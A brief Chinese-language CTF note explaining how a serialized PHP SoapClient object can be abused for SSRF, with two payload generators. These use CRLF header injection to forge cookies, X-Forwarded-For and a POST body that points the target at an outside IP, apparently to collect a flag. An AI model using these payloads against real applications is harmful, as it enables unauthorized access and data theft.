php内置类SoapClient既能发送get传参也能发送post传参
调用一个SoapClient类的对象的不存在方法时,SoapClient类会发送一个独立的http请求,是独立、纯净的http请求,没有换行覆盖其他数据什么的,只是在请求内部构造正常的换行。
SoapClient发送get请求:
<?php $target='http://127.0.0.1/flag.php'; $b = new SoapClient(null,array('location' => $target, 'user_agent' => "npfs\r\nCookie:PHPSESSID=123456\r\n", 'uri' => "http://127.0.0.1/")); $se = serialize($b); echo "|".urlencode($se);
SoapClient发送post请求:
<?php $target = 'http://127.0.0.1/unserbucket/aaaaaaaaaaafxadwagaefae/UcantGuess.php'; $post_string = 'message=iwantflag&url=http://1.116.110.61:5000'; $headers= array( 'X-Forwarded-For:127.0.0.1', 'Cookie:admin=1' ); class fxxk{ public $par0; public $par1; public $par2; public $par3; public $kelasi; public function __construct(){ $this -> par0 = 'SoapClient'; $this -> par1 = NULL; $this -> par2 = array('location'=> 'http://127.0.0.1/unserbucket/aaaaaaaaaaafxadwagaefae/UcantGuess.php','user_agent'=>'wupco^^Content-Type: application/x-www-form-urlencoded^^'.'X-Forwarded-For: 127.0.0.1^^Cookie: admin=1'.'^^Content-Length: '.'46'.'^^^^'.'message=iwantflag&url=http://1.116.110.61:5000','uri'=>"peri0d"); $this -> par3 = 'unser'; } } $aaa = new fxxk(); $aaa= serialize($aaa); $aaa= str_replace('^^','%0d%0a',$aaa); $aaa= str_replace('&','%26',$aaa); echo $aaa;